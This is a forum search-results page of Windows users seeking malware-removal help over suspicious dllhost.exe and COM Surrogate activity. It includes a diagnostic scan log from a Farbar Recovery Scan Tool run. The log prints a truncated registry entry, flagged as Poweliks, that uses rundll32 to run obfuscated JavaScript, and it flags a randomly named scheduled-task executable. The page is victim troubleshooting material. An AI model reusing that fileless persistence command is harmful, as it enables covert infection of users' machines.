Showing results for tags 'dllhost'.

Found 24 results

  1. Hello again, I was looking some stuff up about COM Surrogate and found out it's legit; I thought it was weird since I've never seen it before. I then see it's connected to dllhost.exe. I looked up dllhost.exe out of curiosity, and some people say you should only have one dllhost.exe, located at c\windows\system32. I have this: https://imgur.com/a/LVeGb I'm on Windows 10; is this normal to have 4? Like I said, some places online said you should only have one, located at the system32 Windows folder. I just want to know if this is completely fine. I have scanned a few times recently and haven't come up with any malware, so I don't think I'm infected; I just wanted to know if it's normal to have 4 dllhosts instead of 1 as stated in some online forums. Thanks to anyone who can give me some info about this!
  2. Hello, recently I've had my DLL = (Dllhost.exe *32 Surrogate) behave strangely. Though it was only one instance of DLL, it was eating up to 130,000KB (so I closed it). When looking at processes from all users in the Task Manager I can only spot 2 instances of DLL running, one from "SERVICE" and the other from "LOCAL SERVICE" (both running at around 500KB). Both file locations lead here: "C:\Windows\SysWOW64\dllhost.exe". Is this normal behavior or might this be a virus? PS: Pardon my English.
  3. I have an HP Pavilion dv7 notebook PC (Intel Core i5-2430M CPU 2.40 GHz) with 8 GB RAM and 64-bit Windows 7 Home Premium operating system. I am up to date with Windows service pack and updates. I use the Windows Firewall, Microsoft Security Essentials, and Malwarebytes 2.0.4.1028 (Database version 2015.1.8.10). Lately, Malwarebytes has been giving a 'blocking malicious website' popup message constantly. On the popup, the process is C:\Windows\SysWOW64\dllhost.exe and the type is Outbound. The process and type are always the same - the IP and Port numbers change each time the popup occurs. The popups occur very frequently, one right after another. All I have done so far, besides running the usual security and malware scans, is close the popups - over and over again. I have had success with this forum removing a different type of malware last year so I decided to try you again. Please let me know what you need from me. I have attached a screenshot jpeg of the popup. bray5
  4. I have Norton 360 and have run scans. I ran a Malwarebytes scan and an anti-rootkit scan, but I still have symptoms: slow computer and Norton warnings about COM Surrogate, adclicker. Please help, my computer is rendered non-functionally slow!
  5. I'm afraid I too must join those that are having an issue with this piece of malware. I ran the malwarebytes anti-malware scanner and it removed several issues but the COM Surrogate dllhost.exe*32 issue still remains. Any help that can be provided will be extremely helpful! Thanks, Brian Addition.txt FRST.txt
  6. As does its lesser known, yet still just as annoying siblings dllhst3g.exe and dpnsvr.exe. All three processes have been spotted running on this computer. The latter two appeared for the first time, that I've seen, after scanning with Malwarebytes Premium and uninstalling Microsoft Security Essentials, which I'm starting to believe the latter was not the best thing to do... Also, those two very processes were both running at the same time dllhost.exe was, and when I ended dllhost.exe, the former processes both ended, as well. Coincidence? I THINK NOT! I am also getting constant notifications that an outbound connection has been blocked, going to such trustworthy sites as fff5ee.com, film-site.org and, my favourite, a blank. The dllhost.exe thing had been going on for some weeks, now. Thought I just goofed something up, and after not being able to fix it, got your program to try and salvage this computer. Scanned in safe-mode and found that a plethora of crap was calling my computer home, yet this still continues. I saved the log of the stuff found during the scan that was removed, and I have .png files of the notifications that are now constantly popping up, via snip-it captures, if they are requested. I also have run FRST, like stated, and have also run GMER and TDSS-Killer, without modifying anything. Just getting as much info from .txt files on here so that the unlucky fellow who decides to attempt to help my sorry butt can come to the conclusion that I'm screwed more rapidly. I'm pretty sure my computer's infected with Ebola. An update while writing this. My computer began to run slow, so I went to go chop off the exposed head, and saw three new processes I did not recognise. All three died when dllhost.exe was slain by yours truly. 
C:\Users\Calahan\AppData\Local\CrashDumps2014-11-04 16:36 - 2014-02-28 16:37 - 00000000 ____D () C:\Users\Calahan\Documents\My Games2014-11-04 16:36 - 2014-02-28 16:23 - 00545972 _____ () C:\Windows\DirectX.log2014-11-04 15:59 - 2009-07-14 00:32 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games2014-11-02 23:25 - 2014-06-30 17:19 - 00000000 ____D () C:\Program Files (x86)\Overwolf2014-10-30 21:35 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\rescache2014-10-30 18:18 - 2014-06-30 17:18 - 00000000 ____D () C:\Users\Calahan\AppData\Local\Overwolf2014-10-30 06:25 - 2011-05-26 16:47 - 00275080 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe2014-10-30 02:18 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\SysWOW64\zh-HK2014-10-30 02:18 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\SysWOW64\tr-TR2014-10-30 02:18 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\system32\zh-HK2014-10-30 02:18 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\system32\tr-TR2014-10-30 02:18 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\PolicyDefinitions2014-10-29 11:26 - 2013-09-18 10:43 - 00002193 _____ () C:\Users\Public\Desktop\Google Chrome.lnk2014-10-21 12:20 - 2013-09-18 10:42 - 00003894 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA2014-10-21 12:20 - 2013-09-18 10:42 - 00003642 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore2014-10-20 22:58 - 2014-10-07 22:24 - 00000000 ____D () C:\Users\Calahan\AppData\Roaming\Mount&Blade With Fire and Sword2014-10-20 15:02 - 2014-06-27 21:05 - 00000000 ____D () C:\Users\Calahan\Downloads\pdmod_tool_v1.15_fix12014-10-17 03:50 - 2009-07-13 23:45 - 00416704 _____ () C:\Windows\system32\FNTCACHE.DAT2014-10-17 03:50 - 2009-07-13 22:20 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs \Accessories2014-10-17 03:48 - 2014-05-15 02:26 - 00000000 ___SD () C:\Windows\system32\CompatTel2014-10-17 02:19 - 2011-05-26 17:08 - 00000000 ____D () 
C:\ProgramData\Microsoft Help2014-10-17 02:14 - 2013-09-17 12:32 - 00000000 ____D () C:\Windows\system32\MRT2014-10-17 02:00 - 2011-05-31 15:31 - 103265616 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe2014-10-15 18:06 - 2009-07-14 00:08 - 00032560 _____ () C:\Windows\Tasks\SCHEDLGU.TXT Some content of TEMP:====================C:\Users\administrator\AppData\Local\Temp\ApnStub.exeC:\Users\administrator\AppData\Local\Temp\HPHASUtil.exeC:\Users\administrator\AppData\Local\Temp\jre-6u35-windows-i586-iftw.exeC:\Users\administrator\AppData\Local\Temp\MSN874A.exeC:\Users\administrator\AppData\Local\Temp\uninstall.exeC:\Users\administrator\AppData\Local\Temp\UninstallHPTCA.exeC:\Users\Administrator.cvci20462\AppData\Local\Temp\jre-6u37-windows-i586-iftw.exeC:\Users\Calahan\AppData\Local\Temp\raptrpatch.exeC:\Users\Calahan\AppData\Local\Temp\raptr_stub.exeC:\Users\Calahan\AppData\Local\Temp\SkypeSetup.exeC:\Users\Calahan\AppData\Local\Temp\stuprt.exeC:\Users\Calahan\AppData\Local\Temp\xmlUpdater.exeC:\Users\Logan\AppData\Local\Temp\jre-7u60-windows-i586-iftw.exeC:\Users\Mike2\AppData\Local\Temp\appupdater-{835E6293-B3C4-B247-9C49-3213713F7FC7}.exeC:\Users\Mike2\AppData\Local\Temp\jre-7u40-windows-i586-iftw.exeC:\Users\Mike2\AppData\Local\Temp\jre-7u45-windows-i586-iftw.exeC:\Users\Mike2\AppData\Local\Temp\MouseKeyboardCenterx64_1033.exe ==================== Bamital & volsnap Check ================= (There is no automatic fix for files that do not pass verification.) 
C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2014-10-26 09:18

==================== End Of Log ============================

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 10-11-2014
Ran by Calahan at 2014-11-10 22:58:19
Running from C:\Users\Calahan\Downloads
Boot Mode: Normal
==========================================================

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)
CustomCLSID: HKU\S-1-5-21-2217723503-548262416-3983414958-1007_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?

==================== Restore Points =========================

10-11-2014 00:40:03 Windows Update

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 21:34 - 2012-08-14 09:13 - 00000968 ____A C:\Windows\system32\Drivers\etc\hosts
10.100.5.252 bmtex2010
172.20.16.155 grfdfs
10.100.5.50 stl2k3ns1
10.100.5.51 stl2k3ns2
10.100.5.52 stl2k3dc1
10.100.5.53 stl2k3dc2

==================== Scheduled Tasks (whitelisted) =============

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

Task: {2F324146-BA28-46F8-A8E2-C8E487EF7EBB} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2013-09-18] (Google Inc.)
Task: {482D745E-ECAD-4DD7-ABB2-87622D2AD612} - System32\Tasks\Microsoft_Hardware_Launch_itype_exe => C:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe [2013-05-13] (Microsoft Corporation)
Task: {5447ECDB-2C78-401D-BFAE-F7C6E6F830AF} - System32\Tasks\Overwolf Updater Task => C:\Program Files (x86)\Overwolf\OverwolfUpdater.exe [2014-10-22] (Overwolf LTD)
Task: {A9237A40-FCB0-40E2-B712-4D310799122D} - System32\Tasks\Microsoft_Hardware_Launch_ipoint_exe => C:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe [2013-05-13] (Microsoft Corporation)
Task: {AA3A2AC5-53FF-4D70-B6F1-39A55FA7BA06} - System32\Tasks\Microsoft_MKC_Logon_Task_ipoint.exe => C:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe [2013-05-13] (Microsoft Corporation)
Task: {AAFD7EB2-F0DF-4E39-8C89-8F15B716ED81} - System32\Tasks\Microsoft_MKC_Logon_Task_itype.exe => C:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe [2013-05-13] (Microsoft Corporation)
Task: {B3E7C114-D31F-402A-9253-A4FB8DCB1E3B} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2013-09-18] (Google Inc.)
Task: {DF3E1F4C-B60E-4DFD-93A5-91A4BD728439} - System32\Tasks\{44A1741A-3325-5E3D-3774-F73A5D212500} => C:\Users\Calahan\AppData\Roaming\BMMCegjc\BfVFqtQW\sSmQiMZV\HDDIaJDbA.exe <==== ATTENTION
Task: {E9004E9C-6652-4A05-ABDD-0AE18E65854F} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-09-24] (Adobe Systems Incorporated)
Task: {EF3C8A0C-24A9-4BAE-9739-B91FE7A27393} - System32\Tasks\Microsoft_Hardware_Launch_mousekeyboardcenter_exe => C:\Program Files\Microsoft Mouse and Keyboard Center\mousekeyboardcenter.exe [2013-05-13] (Microsoft)
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

==================== Loaded Modules (whitelisted) =============

2014-02-28 17:18 - 2014-02-28 17:18 - 00075136 _____ () C:\Windows\SysWOW64\PnkBstrA.exe
2013-09-05 00:17 - 2013-09-05 00:17 - 04300456 _____ () C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Cultures\OFFICE.ODF
2010-10-20 14:23 - 2010-10-20 14:23 - 08801632 _____ () C:\Program Files\Microsoft Office\Office14\1033\GrooveIntlResource.dll
2010-01-02 09:42 - 2010-01-02 09:42 - 00098304 _____ () C:\Program Files (x86)\FileZilla FTP Client\fzshellext_64.dll
2009-11-24 18:36 - 2009-11-24 18:36 - 00125440 _____ () C:\Program Files (x86)\Notepad++\NppShell_01.dll
2014-06-27 17:44 - 2011-12-01 14:15 - 00777448 ____N () C:\Program Files\Plantronics\GameCom780\GameCom780.exe
2012-09-13 00:38 - 2012-09-13 00:38 - 00264040 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\CameraHelperShell.exe
2014-11-10 21:15 - 2014-11-10 21:16 - 00380416 _____ () C:\Users\Calahan\Downloads\nffvqpeh.exe
2014-06-27 17:44 - 2011-12-01 14:16 - 00150760 ____N () C:\Program Files\Plantronics\GameCom780\VmixPLGC.dll
2012-09-13 00:38 - 2012-09-13 00:38 - 02144104 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\QtCore4.dll
2012-09-13 00:38 - 2012-09-13 00:38 - 07955304 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\QtGui4.dll
2012-09-13 00:38 - 2012-09-13 00:38 - 00341352 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\QtXml4.dll
2012-09-13 00:38 - 2012-09-13 00:38 - 00028008 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\imageformats\QGif4.dll
2012-09-13 00:38 - 2012-09-13 00:38 - 00127336 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\imageformats\QJpeg4.dll
2012-09-13 00:39 - 2012-09-13 00:39 - 00336232 _____ () C:\Program Files (x86)\Common Files\logishrd\LWSPlugins\LWS\Applets\CameraHelper\DevManagerCore.dll
2013-09-05 00:14 - 2013-09-05 00:14 - 04300456 _____ () C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF
2010-10-20 14:45 - 2010-10-20 14:45 - 08801120 _____ () C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveIntlResource.dll
2011-11-08 15:46 - 2011-11-08 15:46 - 00093696 _____ () C:\Program Files (x86)\FileZilla FTP Client\fzshellext.dll
2014-10-29 11:26 - 2014-10-21 23:04 - 01042760 _____ () C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.111\libglesv2.dll
2014-10-29 11:26 - 2014-10-21 23:04 - 00211272 _____ () C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.111\libegl.dll
2014-10-29 11:26 - 2014-10-21 23:04 - 08910664 _____ () C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.111\pdf.dll
2014-10-29 11:26 - 2014-10-21 23:04 - 01681224 _____ () C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.111\ffmpegsumo.dll
2014-10-29 11:26 - 2014-10-21 23:05 - 14902600 _____ () C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.111\PepperFlash\pepflashplayer.dll

==================== Alternate Data Streams (whitelisted) =========

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)

==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

==================== EXE Association (whitelisted) =============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)

==================== MSCONFIG/TASK MANAGER disabled items =========

(Currently there is no automatic fix for this section.)

========================= Accounts: ==========================

Administrator (S-1-5-21-2217723503-548262416-3983414958-500 - Administrator - Disabled) => C:\Users\Administrator.cvci20462
Calahan (S-1-5-21-2217723503-548262416-3983414958-1007 - Administrator - Enabled) => C:\Users\Calahan
Elisa (S-1-5-21-2217723503-548262416-3983414958-1006 - Limited - Enabled) => C:\Users\Elisa
Guest (S-1-5-21-2217723503-548262416-3983414958-501 - Limited - Enabled) => C:\Users\Guest
HomeGroupUser$ (S-1-5-21-2217723503-548262416-3983414958-1003 - Limited - Enabled)
Logan (S-1-5-21-2217723503-548262416-3983414958-1005 - Administrator - Enabled) => C:\Users\Logan
Mike2 (S-1-5-21-2217723503-548262416-3983414958-1004 - Administrator - Enabled) => C:\Users\Mike2

==================== Faulty Device Manager Devices =============

Name: PS/2 Compatible Mouse
Description: PS/2 Compatible Mouse
Class Guid: {4d36e96f-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: i8042prt
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears.
Remove the device, and this error should be resolved.

==================== Event log errors: =========================

Application errors:
==================
Error: (11/10/2014 08:21:27 PM) (Source: MsiInstaller) (EventID: 1024) (User: HP8100-2)
Description: Product: Adobe Reader XI - Update '{AC76BA86-7AD7-0000-2550-7A8C40011009}' could not be installed. Error code 1625. Windows Installer can create logs to help troubleshoot issues with installing software packages. Use the following link for instructions on turning on logging support: http://go.microsoft.com/fwlink/?LinkId=23127

Error: (11/10/2014 06:53:03 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: accrdsub.exe, version: 6.2.1.52, time stamp: 0x4a266469
Faulting module name: ntdll.dll, version: 6.1.7601.18247, time stamp: 0x521eaf24
Exception code: 0xc0000005
Fault offset: 0x0000000000052eef
Faulting process id: 0x838
Faulting application start time: 0xaccrdsub.exe0
Faulting application path: accrdsub.exe1
Faulting module path: accrdsub.exe2
Report Id: accrdsub.exe3

Error: (11/09/2014 10:52:45 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 9.0.8112.16584, time stamp: 0x4a5bc6b7
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x08356020
Faulting process id: 0x4bc
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (11/09/2014 10:52:45 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 9.0.8112.16584, time stamp: 0x4a5bc6b7
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x0840e020
Faulting process id: 0x2e2c
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (11/09/2014 10:44:48 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program iexplore.exe version 9.0.8112.16584 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.
Process ID: 2074
Start Time: 01cffc98a2a67803
Termination Time: 10
Application Path: C:\Program Files (x86)\Internet Explorer\iexplore.exe
Report Id: e82a2d01-688b-11e4-a553-6c626d9e55b8

Error: (11/09/2014 10:44:41 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 9.0.8112.16584, time stamp: 0x541caffd
Faulting module name: WININET.dll, version: 9.0.8112.16584, time stamp: 0x541cb050
Exception code: 0xc0000005
Fault offset: 0x000d4825
Faulting process id: 0x3230
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (11/08/2014 08:45:52 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: FalloutNV.exe, version: 1.4.0.525, time stamp: 0x4e0d50ed
Faulting module name: FalloutNV.exe, version: 1.4.0.525, time stamp: 0x4e0d50ed
Exception code: 0xc0000005
Fault offset: 0x004232b5
Faulting process id: 0x2c4c
Faulting application start time: 0xFalloutNV.exe0
Faulting application path: FalloutNV.exe1
Faulting module path: FalloutNV.exe2
Report Id: FalloutNV.exe3

Error: (11/08/2014 01:51:08 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: chrome.exe, version: 38.0.2125.111, time stamp: 0x5447163b
Faulting module name: ntdll.dll, version: 6.1.7601.18247, time stamp: 0x521ea8e7
Exception code: 
0xc0000374Fault offset: 0x000ce753Faulting process id: 0xc10Faulting application start time: 0xchrome.exe0Faulting application path: chrome.exe1Faulting module path: chrome.exe2Report Id: chrome.exe3 Error: (11/08/2014 01:39:48 AM) (Source: Chrome) (EventID: 1) (User: NT AUTHORITY)Description: Chrome has encountered a fatal error.ver=38.0.2125.111;lang=;guid=31C333B4351342D580786EE8E019F187;is_machine=1;oop=1;upload=1;minidump=C:\Program Files (x86)\Google\CrashReports\0b75c9e6-b3bb-4218-86a6-721542ef8a63.dmp Error: (11/08/2014 01:37:18 AM) (Source: Chrome) (EventID: 1) (User: NT AUTHORITY)Description: Chrome has encountered a fatal error.ver=38.0.2125.111;lang=;guid=31C333B4351342D580786EE8E019F187;is_machine=1;oop=1;upload=1;minidump=C:\Program Files (x86)\Google\CrashReports\d2a8414e-ff3e-46c5-b902-431b54a16fa7.dmp System errors:=============Error: (11/10/2014 08:26:58 PM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)Description: The following fatal alert was generated: 40. The internal error state is 252. Error: (11/10/2014 08:26:58 PM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)Description: The following fatal alert was generated: 40. The internal error state is 252. 
Error: (11/10/2014 08:22:29 PM) (Source: Service Control Manager) (EventID: 7000) (User: )Description: The HP Health Check Service service failed to start due to the following error: %%2 Error: (11/10/2014 08:21:45 PM) (Source: DCOM) (EventID: 10010) (User: )Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} Error: (11/10/2014 08:18:50 PM) (Source: Service Control Manager) (EventID: 7000) (User: )Description: The DameWare Mini Remote Control service failed to start due to the following error: %%3 Error: (11/10/2014 07:57:56 PM) (Source: Service Control Manager) (EventID: 7001) (User: )Description: The Computer Browser service depends on the Server service which failed to start because of the following error: %%1068 Error: (11/10/2014 07:57:56 PM) (Source: Service Control Manager) (EventID: 7001) (User: )Description: The Computer Browser service depends on the Server service which failed to start because of the following error: %%1068 Error: (11/10/2014 07:57:56 PM) (Source: Service Control Manager) (EventID: 7001) (User: )Description: The Computer Browser service depends on the Server service which failed to start because of the following error: %%1068 Error: (11/10/2014 07:57:56 PM) (Source: Service Control Manager) (EventID: 7001) (User: )Description: The Computer Browser service depends on the Server service which failed to start because of the following error: %%1068 Error: (11/10/2014 07:57:56 PM) (Source: Service Control Manager) (EventID: 7001) (User: )Description: The Computer Browser service depends on the Server service which failed to start because of the following error: %%1068 Microsoft Office Sessions:=========================Error: (11/10/2014 08:21:27 PM) (Source: MsiInstaller) (EventID: 1024) (User: HP8100-2)Description: Adobe Reader XI{AC76BA86-7AD7-0000-2550-7A8C40011009}1625(NULL)(NULL)(NULL) Error: (11/10/2014 06:53:03 PM) (Source: Application Error) (EventID: 1000) (User: )Description: 
accrdsub.exe6.2.1.524a266469ntdll.dll6.1.7601.18247521eaf24c00000050000000000052eef83801cff7cbaa298beaC:\Program Files\ActivIdentity\ActivClient\accrdsub.exeC:\Windows\SYSTEM32\ntdll.dllb5425d6b-6934-11e4-a553-6c626d9e55b8 Error: (11/09/2014 10:52:45 PM) (Source: Application Error) (EventID: 1000) (User: )Description: iexplore.exe9.0.8112.165844a5bc6b7unknown0.0.0.000000000c0000005083560204bc01cffc99acb61f44C:\Program Files\Internet Explorer\iexplore.exeunknown07177948-688d-11e4-a553-6c626d9e55b8 Error: (11/09/2014 10:52:45 PM) (Source: Application Error) (EventID: 1000) (User: )Description: iexplore.exe9.0.8112.165844a5bc6b7unknown0.0.0.000000000c00000050840e0202e2c01cffc99acb58302C:\Program Files\Internet Explorer\iexplore.exeunknown0717a058-688d-11e4-a553-6c626d9e55b8 Error: (11/09/2014 10:44:48 PM) (Source: Application Hang) (EventID: 1002) (User: )Description: iexplore.exe9.0.8112.16584207401cffc98a2a6780310C:\Program Files (x86)\Internet Explorer\iexplore.exee82a2d01-688b-11e4-a553-6c626d9e55b8 Error: (11/09/2014 10:44:41 PM) (Source: Application Error) (EventID: 1000) (User: )Description: iexplore.exe9.0.8112.16584541caffdWININET.dll9.0.8112.16584541cb050c0000005000d4825323001cffc98a390db72C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\syswow64\WININET.dlle64fc0be-688b-11e4-a553-6c626d9e55b8 Error: (11/08/2014 08:45:52 PM) (Source: Application Error) (EventID: 1000) (User: )Description: FalloutNV.exe1.4.0.5254e0d50edFalloutNV.exe1.4.0.5254e0d50edc0000005004232b52c4c01cffb75dc2e1c3cC:\Program Files (x86)\Steam\steamapps\common\Fallout New Vegas\FalloutNV.exeC:\Program Files (x86)\Steam\steamapps\common\Fallout New Vegas\FalloutNV.exe2309037f-67b2-11e4-a553-6c626d9e55b8 Error: (11/08/2014 01:51:08 AM) (Source: Application Error) (EventID: 1000) (User: )Description: chrome.exe38.0.2125.1115447163bntdll.dll6.1.7601.18247521ea8e7c0000374000ce753c1001cffb1f87a3d830C:\Program Files 
(x86)\Google\Chrome\Application\chrome.exeC:\Windows\SysWOW64\ntdll.dll9d5c5460-6713-11e4-a553-6c626d9e55b8 Error: (11/08/2014 01:39:48 AM) (Source: Chrome) (EventID: 1) (User: NT AUTHORITY)Description: Chrome has encountered a fatal error.ver=38.0.2125.111;lang=;guid=31C333B4351342D580786EE8E019F187;is_machine=1;oop=1;upload=1;minidump=C:\Program Files (x86)\Google\CrashReports\0b75c9e6-b3bb-4218-86a6-721542ef8a63.dmp Error: (11/08/2014 01:37:18 AM) (Source: Chrome) (EventID: 1) (User: NT AUTHORITY)Description: Chrome has encountered a fatal error.ver=38.0.2125.111;lang=;guid=31C333B4351342D580786EE8E019F187;is_machine=1;oop=1;upload=1;minidump=C:\Program Files (x86)\Google\CrashReports\d2a8414e-ff3e-46c5-b902-431b54a16fa7.dmp CodeIntegrity Errors:=================================== Date: 2011-12-05 22:19:14.852 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system. Date: 2011-12-05 22:10:09.618 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system. Date: 2011-12-05 22:03:00.342 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system. Date: 2011-12-05 21:51:41.439 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system. Date: 2011-12-05 21:41:31.323 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system. 
Date: 2011-12-01 21:31:57.630 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system. Date: 2011-12-01 19:53:29.363 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system. Date: 2011-12-01 18:55:19.639 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system. Date: 2011-11-30 20:37:01.322 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system. Date: 2011-11-30 20:22:56.207 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system. 
==================== Memory info =========================== Processor: Intel® Core i5 CPU 750 @ 2.67GHzPercentage of memory in use: 43%Total physical RAM: 4031.29 MBAvailable physical RAM: 2292.86 MBTotal Pagefile: 8060.76 MBAvailable Pagefile: 5054.2 MBTotal Virtual: 8192 MBAvailable Virtual: 8191.82 MB ==================== Drives ================================ Drive c: (Hard Drive) (Fixed) (Total:289.83 GB) (Free:29.36 GB) NTFSDrive d: (HP_RECOVERY) (Fixed) (Total:6.25 GB) (Free:0.77 GB) NTFS ==>[system with boot components (obtained from reading drive)]Drive f: (System Reserved) (Fixed) (Total:0.1 GB) (Free:0.06 GB) NTFS ==>[system with boot components (obtained from reading drive)]Drive g: () (Fixed) (Total:232.68 GB) (Free:9.99 GB) NTFS ==================== MBR & Partition Table ================== ========================================================Disk: 0 (MBR Code: Windows 7 or 8) (Size: 298.1 GB) (Disk ID: 6233878F)Partition 1: (Active) - (Size=2 GB) - (Type=07 NTFS)Partition 2: (Not Active) - (Size=289.8 GB) - (Type=07 NTFS)Partition 3: (Not Active) - (Size=6.2 GB) - (Type=07 NTFS) ========================================================Disk: 1 (MBR Code: Windows 7 or 8) (Size: 232.8 GB) (Disk ID: 08000000)Partition 1: (Not Active) - (Size=47 MB) - (Type=DE)Partition 2: (Active) - (Size=100 MB) - (Type=07 NTFS)Partition 3: (Not Active) - (Size=232.7 GB) - (Type=07 NTFS) ==================== End Of Log ============================
